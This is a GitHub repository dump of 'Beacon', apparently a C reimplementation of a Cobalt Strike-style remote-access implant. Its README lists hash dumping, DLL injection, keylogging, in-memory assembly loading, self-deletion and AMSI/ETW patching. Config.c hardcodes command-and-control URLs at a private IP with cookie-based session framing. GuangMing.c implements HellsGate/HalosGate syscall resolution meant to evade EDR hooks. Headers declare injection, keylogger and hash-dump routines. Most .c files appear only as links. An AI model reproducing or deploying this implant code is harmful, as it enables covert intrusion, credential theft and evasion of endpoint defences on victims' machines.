├── ceshi ├── stdafx.h ├── ce.c ├── ceshi.vcxproj.filters └── ceshi.vcxproj ├── Beacon ├── Bof.c ├── File.c ├── Http.c ├── Job.c ├── Util.h ├── util.c ├── Beacon.c ├── Command.c ├── Patch.c ├── Shell.c ├── MetaData.c ├── libcrypto.lib ├── InjectProcess.c ├── CmdExecuteAssembly.c ├── Job.h ├── Config.h ├── Http.h ├── Config.c ├── MetaData.h ├── Beacon.vcxproj.filters ├── Bof.h ├── GuangMing.c ├── Command.h ├── bcookesHalosGate.asm ├── Beacon.vcxproj ├── ntdef.h ├── GuangMing.h └── DunpHash.c ├── README.md ├── Beacon.sln ├── .gitattributes └── .gitignore /ceshi/stdafx.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | -------------------------------------------------------------------------------- /ceshi/ce.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/ceshi/ce.c -------------------------------------------------------------------------------- /Beacon/Bof.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Bof.c -------------------------------------------------------------------------------- /Beacon/File.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/File.c -------------------------------------------------------------------------------- /Beacon/Http.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Http.c -------------------------------------------------------------------------------- /Beacon/Job.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Job.c -------------------------------------------------------------------------------- /Beacon/Util.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Util.h -------------------------------------------------------------------------------- /Beacon/util.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/util.c -------------------------------------------------------------------------------- /Beacon/Beacon.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Beacon.c -------------------------------------------------------------------------------- /Beacon/Command.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Command.c -------------------------------------------------------------------------------- /Beacon/Patch.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Patch.c -------------------------------------------------------------------------------- /Beacon/Shell.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/Shell.c -------------------------------------------------------------------------------- /Beacon/MetaData.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/MetaData.c -------------------------------------------------------------------------------- /Beacon/libcrypto.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/libcrypto.lib -------------------------------------------------------------------------------- /Beacon/InjectProcess.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/InjectProcess.c -------------------------------------------------------------------------------- /Beacon/CmdExecuteAssembly.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M0nster3/Beacon/HEAD/Beacon/CmdExecuteAssembly.c -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Beacon 2 | 3 | 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 4 | 5 | ## 0x01、介绍 6 | 7 | 作者:[Monster3](https://github.com/M0nster3) 8 | 9 | 以后不主要搞安全了,把之前搞得一些东西放出来,大家可以参考参考。 10 | 11 | ## 0x02、实现的一些功能 12 | 13 | 目前实现修改过的 dump hash ,dll 注入功能,键盘记录,joblist,jobkill,Bof 加载,net 内存加载,shell,run、文件操作相应的功能,sleep,获取主机目录,还有自删除以及 patch ETW,patch Amsi 还添加了光明之门等功能。 14 | 15 | 可能有一些bug,师傅们看的自己修改一下 16 | 17 | -------------------------------------------------------------------------------- /Beacon/Job.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Command.h" 3 | typedef struct { 4 | HANDLE hReadPipe; 5 | STARTUPINFO si; 6 | HANDLE hWritePipe; 7 | } CreatePipeJob; 8 | 9 | CreatePipeJob createjob(); 10 | 11 | 12 | BeaconJob* Add_Beacon_0Job(HANDLE hProcess, HANDLE hThread, int dwProcessId, int dwThreadId, HANDLE hReadPipe, HANDLE hWritePipe, const char* jobname); 13 | void beacon_jobs(); 14 | void KEYLOGGEJob(int FlagsAndAttributes, char* Taskdata, int Task_size, int lasting); 15 | void BeaconFormatPrintf(formatp* format, char* fmt, ...); 16 | void beacon_JobKill(char* Taskdata, int Task_size); -------------------------------------------------------------------------------- /Beacon/Config.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | unsigned char* metadata_prepend; 6 | unsigned char* metadata_header; 7 | extern const char Http_get_uri[]; 8 | extern const char Http_Post_uri[]; 9 | unsigned char* Http_post_id_prepend; 10 | unsigned char* Http_post_id_append; 11 | unsigned char* Http_post_client_output_prepend; 12 | unsigned char* Http_post_client_output_append; 13 | extern unsigned char* pub_key_str; 14 | unsigned char* Response_prepend; 15 | unsigned char* Response_append; 16 | unsigned char IV[]; 17 | int SleepTime; 18 | unsigned char AESRandaeskey[16]; 19 | unsigned char Hmackey[16]; 20 | int Counter; 21 | int clientID; -------------------------------------------------------------------------------- /Beacon/Http.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef struct { 9 | size_t respsize; 10 | unsigned char* resqresult; 11 | int code; 12 | }perform_requestresult; 13 | 14 | perform_requestresult perform_get_request(unsigned char* url, struct curl_slist* headers); 15 | unsigned char* parseGetResponse(unsigned char* data, size_t dataSize, size_t* responsedatalen); 16 | unsigned char* parsePacket(unsigned char* decryptedBuf, uint32_t* totalLen, uint32_t* commandType, size_t* commandBuflen , size_t* jia,int* jiaci); 17 | perform_requestresult perform_post_request(unsigned char* url, struct curl_slist* headers, const char* postData); -------------------------------------------------------------------------------- /Beacon/Config.c: -------------------------------------------------------------------------------- 1 | #include "Config.h" 2 | #include 3 | 4 | const char Http_get_uri[] = "http://10.10.100.74:80/www/handle/doc"; 5 | const char Http_Post_uri[] = "http://10.10.100.74:80/IMXo"; 6 | unsigned char* pub_key_str ="-----BEGIN PUBLIC KEY-----\n" 7 | "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCTWvb4Msb5iR3d+0DbOnj1HJ1ewGTxZgCyCxqT\n" 8 | "-----END PUBLIC KEY-----\n"; 9 | 10 | unsigned char* metadata_prepend = "SESSIONID="; 11 | unsigned char* metadata_header = "Cookie:"; //ÔÚprofileÖв»ÓüÓ:ºÅ 12 | unsigned char* Response_prepend = "data="; 13 | unsigned char* Response_append = "%%"; 14 | unsigned char* Http_post_id_prepend = "user="; 15 | unsigned char* Http_post_id_append = "%%"; 16 | unsigned char* Http_post_client_output_prepend = "data="; 17 | unsigned char* Http_post_client_output_append = "%%"; 18 | unsigned char IV[] = "abcdefghijklmnop"; 19 | int SleepTime = 3000; 20 | int Counter = 0; 21 | -------------------------------------------------------------------------------- /ceshi/ceshi.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 23 | 24 | 头文件 25 | 26 | 27 | -------------------------------------------------------------------------------- /Beacon/MetaData.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #pragma warning(disable:4996) 19 | 20 | typedef struct { 21 | uint8_t* MakeMeta; 22 | size_t MakeMetaLen; 23 | } MakeMetaInfoResult; 24 | 25 | typedef struct { 26 | unsigned char* EncryMetadata; 27 | int EncryMetadataLen; 28 | } EncryMetadataResult; 29 | 30 | 31 | MakeMetaInfoResult MakeMetaInfo(); 32 | EncryMetadataResult EncryMetadata(); 33 | bool IsHighPriv(); 34 | bool IsOSX64(); 35 | bool IsProcessX64(); 36 | int GetMetaDataFlag(); 37 | unsigned char* GetOSVersion(); 38 | uint32_t GetLocalIPInt(); 39 | char* GetComputerNameAsString(); 40 | char* GetUsername(); 41 | char* GetProcessName(); 42 | unsigned char* GetCodePageANSI(size_t* bytesWritten); 43 | unsigned char* GetCodePageOEM(size_t* bytesWritten); 44 | uint8_t* GetMagicHead(uint8_t* MagicHead); -------------------------------------------------------------------------------- /Beacon.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Beacon", "Beacon\Beacon.vcxproj", "{191A6F50-AE83-44D1-8446-9AFB9A077A97}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x64.ActiveCfg = Debug|x64 17 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x64.Build.0 = Debug|x64 18 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x86.ActiveCfg = Debug|Win32 19 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Debug|x86.Build.0 = Debug|Win32 20 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x64.ActiveCfg = Release|x64 21 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x64.Build.0 = Release|x64 22 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x86.ActiveCfg = Release|Win32 23 | {191A6F50-AE83-44D1-8446-9AFB9A077A97}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {5E985E9E-A6D4-4AD8-9127-66D77FF25434} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /Beacon/Beacon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {c080beae-b605-4553-9fed-0d69133780cb} 18 | 19 | 20 | {5b78ffdf-c6a7-4564-a111-4330e03fe7f6} 21 | 22 | 23 | {4b192a07-2beb-49bf-9f1b-01107daae80f} 24 | 25 | 26 | 27 | 28 | 源文件 29 | 30 | 31 | 源文件\MetaData 32 | 33 | 34 | 源文件\Util 35 | 36 | 37 | 源文件 38 | 39 | 40 | 源文件 41 | 42 | 43 | 源文件\Command 44 | 45 | 46 | 源文件\Command 47 | 48 | 49 | 源文件\Command 50 | 51 | 52 | 源文件 53 | 54 | 55 | 源文件\Command 56 | 57 | 58 | 源文件\Command 59 | 60 | 61 | 源文件 62 | 63 | 64 | 源文件 65 | 66 | 67 | 源文件 68 | 69 | 70 | 源文件\Util 71 | 72 | 73 | 74 | 75 | 头文件 76 | 77 | 78 | 头文件 79 | 80 | 81 | 头文件 82 | 83 | 84 | 头文件 85 | 86 | 87 | 头文件 88 | 89 | 90 | 头文件 91 | 92 | 93 | 头文件 94 | 95 | 96 | 头文件 97 | 98 | 99 | 头文件 100 | 101 | 102 | 103 | 104 | 源文件 105 | 106 | 107 | -------------------------------------------------------------------------------- /Beacon/Bof.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Util.h" 3 | 4 | 5 | typedef HMODULE(__stdcall* fpLoadLibraryA)(LPCSTR lpLibFileName); 6 | typedef BOOL(__stdcall* fpFreeLibrary)(HMODULE hLibModule); 7 | typedef FARPROC(__stdcall* fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName); 8 | typedef HMODULE(__stdcall* fpGetModuleHandleA)(LPCSTR lpModuleName); 9 | typedef void(__cdecl* fpBeaconDataParse)(formatp* parser, char* buffer, int size); 10 | typedef char* (__cdecl* fpBeaconDataPtr)(formatp* parser, int size); 11 | typedef int(__cdecl* fpBeaconDataInt)(formatp* parser); 12 | typedef short(__cdecl* fpBeaconDataShort)(formatp* parser); 13 | typedef int(__cdecl* fpBeaconDataLength)(formatp* parser); 14 | typedef char* (__cdecl* fpBeaconDataExtract)(formatp* parser, int* size); 15 | typedef void(__cdecl* fpBeaconFormatAlloc)(formatp* format, int maxsz); 16 | typedef void(__cdecl* fpBeaconFormatReset)(formatp* format); 17 | typedef void(__cdecl* fpBeaconFormatAppend)(formatp* format, char* text, int len); 18 | typedef void(__cdecl* fpBeaconFormatPrintf)(formatp* format, char* fmt, ...); 19 | typedef char* (__cdecl* fpBeaconFormatToString)(formatp* format, int* size); 20 | typedef void(__cdecl* fpBeaconFormatFree)(formatp* format); 21 | typedef void(__cdecl* fpBeaconFormatInt)(formatp* format, int value); 22 | typedef void(__cdecl* fpBeaconOutput)(int type, char* data, int len); 23 | typedef void(__cdecl* fpBeaconPrintf)(int type, char* fmt, ...); 24 | typedef void(__cdecl* fpBeaconErrorD)(int BeaconErrorsType, DWORD error_code); 25 | typedef void(__cdecl* fpBeaconErrorDD)(int BeaconErrorsType, int err_msg, u_long err_code_msg); 26 | typedef void(__cdecl* fpBeaconErrorNA)(int BeaconErrorsType); 27 | typedef BOOL(__cdecl* fpBeaconUseToken)(HANDLE token); 28 | typedef BOOL(__cdecl* fpBeaconIsAdmin)(); 29 | typedef void(__cdecl* fpBeaconRevertToken)(); 30 | typedef void(__cdecl* fpBeaconGetSpawnTo)(BOOL x86, char* buffer, int length); 31 | typedef void(__cdecl* fpBeaconInjectProcess)(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 32 | typedef void(__cdecl* fpBeaconInjectTemporaryProcess)(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 33 | typedef BOOL(__cdecl* fpBeaconSpawnTemporaryProcess)(BOOL x86, BOOL ignoreToken, STARTUPINFOA* si, PROCESS_INFORMATION* pInfo); 34 | typedef void(__cdecl* fpBeaconCleanupProcess)(PROCESS_INFORMATION* pInfo); 35 | typedef BOOL(__cdecl* fptoWideChar)(char* src, wchar_t* dst, unsigned int max); 36 | 37 | typedef struct { 38 | fpLoadLibraryA LoadLibraryA; 39 | fpFreeLibrary FreeLibrary; 40 | fpGetProcAddress GetProcAddress; 41 | fpGetModuleHandleA GetModuleHandleA; 42 | fpBeaconDataParse BeaconDataParse; 43 | fpBeaconDataPtr BeaconDataPtr; 44 | fpBeaconDataInt BeaconDataInt; 45 | fpBeaconDataShort BeaconDataShort; 46 | fpBeaconDataLength BeaconDataLength; 47 | fpBeaconDataExtract BeaconDataExtract; 48 | fpBeaconFormatAlloc BeaconFormatAlloc; 49 | fpBeaconFormatReset BeaconFormatReset; 50 | fpBeaconFormatAppend BeaconFormatAppend; 51 | fpBeaconFormatPrintf BeaconFormatPrintf; 52 | fpBeaconFormatToString BeaconFormatToString; 53 | fpBeaconFormatFree BeaconFormatFree; 54 | fpBeaconFormatInt BeaconFormatInt; 55 | fpBeaconOutput BeaconOutput; 56 | fpBeaconPrintf BeaconPrintf; 57 | fpBeaconErrorD BeaconErrorD; 58 | fpBeaconErrorDD BeaconErrorDD; 59 | fpBeaconErrorNA BeaconErrorNA; 60 | fpBeaconUseToken BeaconUseToken; 61 | fpBeaconRevertToken BeaconRevertToken; 62 | fpBeaconIsAdmin BeaconIsAdmin; 63 | fpBeaconGetSpawnTo BeaconGetSpawnTo; 64 | fpBeaconInjectProcess BeaconInjectProcess; 65 | fpBeaconInjectTemporaryProcess BeaconInjectTemporaryProcess; 66 | fpBeaconSpawnTemporaryProcess BeaconSpawnTemporaryProcess; 67 | fpBeaconCleanupProcess BeaconCleanupProcess; 68 | fptoWideChar toWideChar; 69 | char* end; 70 | 71 | }BeaconInternalFunctions; 72 | 73 | typedef struct 74 | { 75 | short Type; 76 | short id; 77 | int offset; 78 | int OffsetInSection; 79 | }BeaconBofRelocation; -------------------------------------------------------------------------------- /Beacon/GuangMing.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/ 3 | Credits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique) 4 | */ 5 | #include 6 | #include "GuangMing.h" 7 | #include 8 | 9 | 10 | PVOID ntdll = NULL; 11 | PVOID ntdllExportTable = NULL; 12 | 13 | PVOID ntdllExAddrTbl = NULL; 14 | PVOID ntdllExNamePtrTbl = NULL; 15 | PVOID ntdllExOrdinalTbl = NULL; 16 | 17 | const char SyscallString[] = "NtAllocateVirtualMemory"; 18 | DWORD SyscallLen = 0; 19 | PVOID SyscallAddr = NULL; 20 | DWORD SyscallNumber = 0; 21 | 22 | 23 | 24 | SYSTEM_PROCESS_INFORMATION* procinfo; 25 | 26 | DWORD GetSyscallNumber(char* Page, int SyscallLen) { 27 | char SyscallString[32]; 28 | memcpy(SyscallString, Page, SyscallLen); 29 | SyscallString[SyscallLen] = '\0'; 30 | printf("###################################################################\r\n"); 31 | // Use Position Independent Shellcode to resolve the address of NTDLL and its export tables 32 | ntdll = getntdll(); 33 | printf("[+] %p : NTDLL Base Address\r\n", ntdll); 34 | 35 | ntdllExportTable = getExportTable(ntdll); 36 | printf("[+] %p : NTDLL Export Table Address\r\n", ntdllExportTable); 37 | 38 | ntdllExAddrTbl = getExAddressTable(ntdllExportTable, ntdll); 39 | printf("[+] %p : NTDLL Export Address Table Address\r\n", ntdllExAddrTbl); 40 | 41 | ntdllExNamePtrTbl = getExNamePointerTable(ntdllExportTable, ntdll); 42 | printf("[+] %p : NTDLL Export Name Pointer Table Address\r\n", ntdllExNamePtrTbl); 43 | 44 | ntdllExOrdinalTbl = getExOrdinalTable(ntdllExportTable, ntdll); 45 | printf("[+] %p : NTDLL Export Ordinal Table Address\r\n", ntdllExOrdinalTbl); 46 | printf("###################################################################\r\n\r\n"); 47 | // Find the address of NTDLL.NtQuerySystemInformation by looping through NTDLL export tables 48 | //SyscallLen = strl(SyscallString); 49 | printf("[-] Looping through NTDLL Export tables to discover the address for NTDLL.%s..\r\n", SyscallString); 50 | SyscallAddr = getApiAddr( 51 | SyscallLen, 52 | SyscallString, 53 | ntdll, 54 | ntdllExAddrTbl, 55 | ntdllExNamePtrTbl, 56 | ntdllExOrdinalTbl 57 | ); 58 | printf("[+] %p : NTDLL.%s Address\r\n\r\n", SyscallAddr, SyscallString); 59 | printf("[-] Using HellsGate technique to discover syscall for %s..\r\n", SyscallString); 60 | 61 | SyscallNumber = findSyscallNumber(SyscallAddr); 62 | // HalosGate technique to recover the systemcall number. Used when stub in NTDLL is hooked. This evades/bypasses EDR Userland hooks 63 | if (SyscallNumber == 0) { 64 | printf("[!] Failed to discover the syscall number for . The API is likely hooked by EDR\r\n"); 65 | printf("[-] Using HalosGate technique to discover syscall for ..\r\n"); 66 | DWORD index = 0; 67 | while (SyscallNumber == 0) { 68 | index++; 69 | // Check for unhooked Sycall Above the target stub 70 | SyscallNumber = halosGateUp(SyscallAddr, index); 71 | if (SyscallNumber) { 72 | SyscallNumber = SyscallNumber - index; 73 | break; 74 | } 75 | // Check for unhooked Sycall Below the target stub 76 | SyscallNumber = halosGateDown(SyscallAddr, index); 77 | if (SyscallNumber) { 78 | SyscallNumber = SyscallNumber + index; 79 | break; 80 | } 81 | } 82 | } 83 | 84 | 85 | // Allocate the buffer for the process information returned from NtQuerySystemInformation 86 | //ULONG size = 1 << 18; 87 | //PVOID base_addr = NULL; 88 | //SIZE_T buffSize1 = (SIZE_T)size; 89 | //ULONG required = 0; 90 | 91 | // NtAllocateVirtualMemory 92 | 93 | return SyscallNumber; 94 | //// NtQuerySystemInformation 95 | //HellsGate(ntQrySysInfoSyscallNumber); 96 | 97 | //NTSTATUS status = HellDescent(SystemProcessInformation, base_addr, size, &required); 98 | 99 | //if (status == STATUS_BUFFER_TOO_SMALL) { 100 | // size = required + (1 << 14); 101 | // SIZE_T buffSize2 = size; 102 | // // NtAllocateVirtualMemory 103 | // HellsGate(SyscallNumber); 104 | // HellDescent((HANDLE)-1, &base_addr, 0, &buffSize2, MEM_COMMIT | MEM_RESERVE, SyscallString_READWRITE); 105 | //} 106 | 107 | //NTSTATUS status2 = HellDescent(SystemProcessInformation, base_addr, size, &required); 108 | 109 | //procinfo = (SYSTEM_PROCESS_INFORMATION*)base_addr; 110 | //while (TRUE) { 111 | // BOOL check = compExplorer(procinfo->ImageName.Buffer); 112 | // if (check == 1) { 113 | // printf("%ws | PID: %6u | PPID: %6u\n", 114 | // procinfo->ImageName.Buffer, 115 | // HandleToULong(procinfo->UniqueProcessId), 116 | // HandleToULong(procinfo->InheritedFromUniqueProcessId) 117 | // ); 118 | // break; 119 | // } 120 | // procinfo = (SYSTEM_PROCESS_INFORMATION*)((BYTE*)procinfo + procinfo->NextEntryOffset); 121 | //} 122 | //return; 123 | } -------------------------------------------------------------------------------- /ceshi/ceshi.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {e627f4de-5f33-4d18-bb6d-1c3d0f709423} 25 | ceshi 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /Beacon/Command.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include "Config.h" 15 | #include "Util.h" 16 | #include "Bof.h"; 17 | 18 | typedef struct { 19 | int JobNumber; 20 | HANDLE pHandle; 21 | HANDLE hThread; 22 | int dwProcessId; 23 | int dwThreadId; 24 | HANDLE hReadPipe; 25 | HANDLE hWritePipe; 26 | struct BeaconJob* Linked; 27 | BOOL state; 28 | BOOL kill; 29 | int JobProcessPid; 30 | int JobType; 31 | short lasting; 32 | char JobName[64]; 33 | }BeaconJob; 34 | void SleepTimes(unsigned char* Buf); 35 | unsigned char* CmdFileBrowse(unsigned char* commandBuf, size_t* lenn); 36 | void DataProcess(unsigned char* buf, size_t lenn, int callback); 37 | 38 | unsigned char* parseUpload(unsigned char* commandBuf, size_t* commandBuflen, size_t* lenn, int chunkNumber); 39 | unsigned char* CmdDrives(unsigned char* commandBuf, size_t* commandBuflen); 40 | unsigned char* cmdMkdir(unsigned char* cmdBuf, size_t* commandBuflen, size_t* Bufflen); 41 | unsigned char* fileRemove(unsigned char* cmdBuf, size_t* commandBuflen, size_t* Bufflen); 42 | unsigned char* Download(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 43 | unsigned char* Cmdshell(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 44 | 45 | void __cdecl BeaconBof(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 46 | //unsigned char* EXECUTE_ASSEMBLY(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 47 | //unsigned char* EXECUTE_ASSEMBLY(unsigned char* Taskdata, size_t* Task_size, int x86, int ignoreToken); 48 | unsigned char* EXECUTE_ASSEMBLY(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 49 | void PipeJob(unsigned char* buf, size_t* commandBuflen, size_t* Bufflen); 50 | 51 | void ProcessInject(int pid, PROCESS_INFORMATION* pi, HANDLE hProcess, char* payload, size_t p_len, int p_offset, char* arg, int a_len); 52 | BeaconJob* Add_Beacon_0Job(HANDLE hProcess, HANDLE hThread, int dwProcessId, int dwThreadId, HANDLE hReadPipe, HANDLE hWritePipe, const char* jobname); 53 | void CheckTimeout(HANDLE hNamedPipe, int timeout); 54 | 55 | 56 | void beacon_ps(char* Taskdata, int Task_size); 57 | int DumpHASH(); 58 | 59 | int Is_Wow64(HANDLE hProcess); 60 | int BeaconFormatlength(formatp* format); 61 | void BeaconFormatFree(formatp* format); 62 | void BeaconFormatAlloc(formatp* format, int maxsz); 63 | void BeaconFormatInit(formatp* format, char* buff, int buffsize); 64 | void BeaconFormatPrintf(formatp* format, char* fmt, ...); 65 | void BeaconDataParse(datap* parser, char* buffer, int size); 66 | char* BeaconDataPtr(datap* parser, int size); 67 | char* BeaconDataPtr2(datap* parser); 68 | int BeaconDataInt(datap* parser); 69 | short BeaconDataShort(datap* parser); 70 | int BeaconDataLength(datap* parser); 71 | char* BeaconDataExtract(datap* parser, int* outsize); 72 | void BeaconFormatReset(formatp* format); 73 | void BeaconFormatAppend(formatp* format, char* text, int len); 74 | char* BeaconFormatToString(formatp* format, int* size); 75 | void BeaconFormatInt(formatp* format, int value); 76 | void BeaconErrorNA(); 77 | void BeaconErrorDD(); 78 | void BeaconRevertToken(); 79 | void BeaconErrorD(); 80 